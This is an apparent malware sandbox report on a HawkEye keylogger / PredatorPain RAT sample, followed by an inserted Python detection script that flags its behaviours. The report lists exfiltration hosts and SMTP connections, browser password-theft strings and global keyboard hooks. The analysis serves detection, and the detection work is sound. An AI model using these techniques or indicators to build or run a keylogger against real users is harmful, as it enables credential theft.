Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_0520603F
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_0520A244
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_0520985B
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then call 05201B20h 5_2_052094AC
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_052094AC
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_052014C0
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_05205CCE

                    Networking:

                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeDomain query: smtp.mail.ru
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeNetwork Connect: 94.100.180.160 587
                    May check the online IP address of the machine
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficTCP traffic: 192.168.2.3:49711 -> 94.100.180.160:587
                    Source: global trafficTCP traffic: 192.168.2.3:49711 -> 94.100.180.160:587
                    Source: svchost.exe, 00000004.00000002.270937133.000000001DA0C000.00000004.00000001.sdmp, Windows Update.exe, 00000008.00000000.279304635.0000000002B61000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490119610.000000000108C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.geotrust.com/GeoTrustRSACA2018.crt0
                    Source: svchost.exe, 00000004.00000002.270937133.000000001DA0C000.00000004.00000001.sdmp, Windows Update.exe, 00000008.00000000.279304635.0000000002B61000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490119610.000000000108C000.00000004.00000001.sdmpString found in binary or memory: http://cdp.geotrust.com/GeoTrustRSACA2018.crl0L
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                    Source: svchost.exe, 00000004.00000002.270937133.000000001DA0C000.00000004.00000001.sdmp, Windows Update.exe, 00000008.00000002.313966504.0000000006904000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490119610.000000000108C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: svchost.exe, 0000000D.00000002.491272541.000001990D615000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: svchost.exe, 0000000D.00000002.491272541.000001990D615000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: svchost.exe, 00000004.00000002.270937133.000000001DA0C000.00000004.00000001.sdmp, Windows Update.exe, 00000008.00000002.313966504.0000000006904000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490119610.000000000108C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                    Source: svchost.exe, 0000000D.00000002.491350262.000001990D649000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                    Source: svchost.exe, 00000004.00000002.270937133.000000001DA0C000.00000004.00000001.sdmp, Windows Update.exe, 00000008.00000000.279304635.0000000002B61000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490119610.000000000108C000.00000004.00000001.sdmpString found in binary or memory: http://status.geotrust.com0=
                    Source: taskhost.exe, 00000005.00000002.322122044.00000000030B1000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeString found in binary or memory: http://whatismyipaddress.com/
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: taskhost.exe, 00000005.00000003.232245246.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                    Source: taskhost.exe, 00000005.00000003.232245246.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com_
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: taskhost.exe, 00000005.00000003.232245246.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comlt
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: iExplorer.exe, 00000007.00000002.250883500.00000000010B8000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comW
                    Source: iExplorer.exe, 00000007.00000002.250883500.00000000010B8000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comlvfet
                    Source: taskhost.exe, 00000005.00000003.235933696.000000000574B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comoL
                    Source: taskhost.exe, 00000005.00000003.235933696.000000000574B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comrsh
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: taskhost.exe, 00000005.00000003.231707810.0000000005772000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: taskhost.exe, 00000005.00000003.231021953.000000000576E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/P
                    Source: iExplorer.exe, 00000007.00000003.231598313.00000000057BC000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/T
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: taskhost.exe, 00000005.00000003.231408705.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn1
                    Source: taskhost.exe, 00000005.00000003.231707810.0000000005772000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnE
                    Source: taskhost.exe, 00000005.00000003.231488771.0000000005771000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnO
                    Source: taskhost.exe, 00000005.00000003.231545876.0000000005751000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cntL
                    Source: iExplorer.exe, 00000007.00000003.231598313.00000000057BC000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnz
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: svchost.exeString found in binary or memory: http://www.hackforums.net/member.php
                    Source: svchost.exe, 00000004.00000002.266893331.00000000039C4000.00000004.00000001.sdmpString found in binary or memory: http://www.hackforums.net/member.php?action=3Dprofile&uid=3D177092).=
                    Source: svchost.exe, 00000004.00000002.259142948.0000000000F32000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000000.254608825.0000000000BC2000.00000002.00020000.sdmp, svchost.exe, 00000013.00000000.267457896.0000000000322000.00000002.00020000.sdmpString found in binary or memory: http://www.hackforums.net/member.php?action=profile&uid=177092).
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmp, taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/16
                    Source: taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/;
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G
                    Source: taskhost.exe, 00000005.00000003.232528224.000000000574B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Versh
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Vet
                    Source: taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0rsh
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/c
                    Source: taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/z
                    Source: taskhost.exe, 00000005.00000003.233268599.000000000574A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/phy/
                    Source: taskhost.exe, 00000005.00000003.234152424.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/z
                    Source: vbc.exe, 00000014.00000002.274318737.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: taskhost.exe, 00000005.00000002.322122044.00000000030B1000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                    Source: iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: taskhost.exe, 00000005.00000003.232159632.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comO
                    Source: taskhost.exe, 00000005.00000003.232159632.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: taskhost.exe, 00000005.00000003.235558162.0000000005770000.00000004.00000001.sdmp, taskhost.exe, 00000005.00000003.235337554.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
                    Source: taskhost.exe, 00000005.00000002.325663721.0000000006A02000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: taskhost.exe, 00000005.00000003.231928279.0000000005770000.00000004.00000001.sdmp, iExplorer.exe, 00000007.00000002.254393822.0000000006A02000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: svchost.exe, 00000004.00000002.266303126.00000000039A2000.00000004.00000001.sdmpString found in binary or memory: https://biz.mail.ru)
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: Windows Update.exe, 00000008.00000000.279304635.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: https://tamina212.000webhostapp.com/data.php
                    Source: svchost.exe, 00000004.00000002.270937133.000000001DA0C000.00000004.00000001.sdmp, Windows Update.exe, 00000008.00000002.313966504.0000000006904000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490119610.000000000108C000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: unknownDNS traffic detected: queries for: smtp.mail.ru
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_02AFA09A recv,5_2_02AFA09A
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: taskhost.exe, 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, iExplorer.exe, 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, Windows Update.exe, 00000008.00000002.313456976.0000000003D6C000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: taskhost.exe, iExplorer.exe, Windows Update.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    Yara detected HawkEye Keylogger
                    Source: Yara matchFile source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskhost.exe PID: 4548, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED
                    Installs a global keyboard hook
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\svchost.exe
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\taskhost.exe
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Windows Update.exe
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeWindows user hook set: 0 keyboard low level C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeWindows user hook set: 0 keyboard low level C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                    Contains functionality to log keystrokes (.Net Source)
                    Source: taskhost.exe.1.dr, Form1.cs.Net Code: HookKeyboard
                    Source: iExplorer.exe.1.dr, Form1.cs.Net Code: HookKeyboard
                    Source: WindowsUpdate.exe.5.dr, Form1.cs.Net Code: HookKeyboard
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: Windows Update.exe.7.dr, Form1.cs.Net Code: HookKeyboard
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_00404EA7 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404EA7
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeWindow created: window name: CLIPBRDWNDCLASS
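                    The Networking signatures above (a binary named svchost.exe running from a user-writable path, resolving smtp.mail.ru and connecting to 94.100.180.160 on TCP 587, plus repeated DNS lookups for whatismyipaddress.com) and the keyboard-hook lines in this section (a low-level keyboard hook set with a leading 0) can be turned into a small triage check over the report's behaviour lines. The following is an added example and is not part of the Joe Sandbox report or of the sample's own code. It assumes behaviour lines in the report's "Source: <process> <event>: <detail>" shape (it also tolerates the fused "svchost.exeNetwork Connect:" form seen above); the sample lines are constructed to mirror the ones in this report plus one benign control; the rule names, the list of IP-check domains and the reading of the hook line's leading 0 as the SetWindowsHookEx target thread id (0 meaning every thread on the desktop) are my assumptions.

```python
"""Triage check for the behaviours the sandbox signatures above describe.

Added example, not code from the report or the sample.  Input lines follow the
report's own 'Source: <process> <event>: <detail>' shape.
"""
import ipaddress
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# Where Windows-named system binaries legitimately execute from.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# System binary names the sample borrows to blend in (all appear in the report).
SYSTEM_BINARY_NAMES = {"svchost.exe", "taskhost.exe", "taskhostex.exe", "dllhost.exe"}
# SMTP / mail-submission ports; the sample exfiltrates over 587.
SMTP_PORTS = {25, 465, 587, 2525}
# External IP lookup services (assumed list; whatismyipaddress.com is from the report).
IP_CHECK_DOMAINS = {"whatismyipaddress.com", "api.ipify.org", "icanhazip.com", "checkip.dyndns.org"}

# Lazy '.+?\.exe' stops at the first .exe, so the fused 'svchost.exeNetwork Connect:' form parses too.
LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)\s*"
    r"(?P<event>Network Connect|Domain query|DNS query|Windows user hook set):\s*"
    r"(?P<detail>.*)$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    rule: str
    process: str
    detail: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_system_dir(path: str) -> bool:
    lowered = path.lower()
    return any(lowered.startswith(d) for d in SYSTEM_DIRS)


def parse_line(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (process path, event name, detail) or None for lines of another shape."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("proc").strip(), m.group("event").lower(), m.group("detail").strip()


def analyze(lines: Iterable[str]) -> List[Finding]:
    findings: List[Finding] = []
    seen = set()

    def emit(rule: str, proc: str, detail: str) -> None:
        f = Finding(rule, proc, detail)
        if f not in seen:          # one finding per (rule, process, detail)
            seen.add(f)
            findings.append(f)

    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, event, detail = parsed
        # A system binary name outside System32/SysWOW64 is masquerading.
        masquerade = basename(proc) in SYSTEM_BINARY_NAMES and not in_system_dir(proc)
        if masquerade:
            emit("system-binary-name-outside-system-dir", proc, proc)

        if event == "network connect":            # detail: '<ip> <port>'
            host, _, port = detail.rpartition(" ")
            try:
                ipaddress.ip_address(host)
                port_no = int(port)
            except ValueError:
                continue
            if masquerade:
                emit("masquerading-system-process-network-connect", proc, f"{host}:{port_no}")
            if port_no in SMTP_PORTS and not in_system_dir(proc):
                emit("smtp-connection-from-user-writable-path", proc, f"{host}:{port_no}")
        elif event in ("domain query", "dns query"):   # detail: 'name: <fqdn>' or '<fqdn>'
            name = detail.split("name:")[-1].strip().lower()
            if name in IP_CHECK_DOMAINS:
                emit("external-ip-lookup", proc, name)
        elif event == "windows user hook set":    # detail: '<thread id> <hook type> <module>'
            thread_id, _, rest = detail.partition(" ")
            # Assumption: leading field is the SetWindowsHookEx dwThreadId; 0 = global hook.
            if thread_id == "0" and "keyboard low level" in rest.lower() and not in_system_dir(proc):
                emit("global-low-level-keyboard-hook", proc, rest)
    return findings


def summarize(findings: Iterable[Finding]) -> Dict[str, int]:
    return dict(Counter(f.rule for f in findings))


# Constructed sample input mirroring the report lines above, plus a benign control.
SAMPLE_LINES = [
    r"Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe Domain query: smtp.mail.ru",
    r"Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe Network Connect: 94.100.180.160 587",
    r"Source: C:\Users\user\AppData\Local\Temp\taskhost.exe DNS query: name: whatismyipaddress.com",
    r"Source: C:\Users\user\AppData\Local\Temp\taskhost.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\taskhost.exe",
    r"Source: C:\Users\user\AppData\Roaming\Windows Update.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Windows Update.exe",
    # Benign control (constructed): the real svchost.exe talking HTTPS to a TEST-NET address.
    r"Source: C:\Windows\System32\svchost.exe Network Connect: 203.0.113.10 443",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LINES):
        print(f"{f.rule:45} {f.process}  ->  {f.detail}")
    print(summarize(analyze(SAMPLE_LINES)))
```

The control line on the real svchost.exe produces nothing, so the rules key on the combination of name, path and behaviour rather than on the binary name alone; a real environment would feed the same functions from Sysmon events 1, 3 and 22 instead of sandbox text.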

                    System Summary:

                    Yara detected PredatorPainRAT
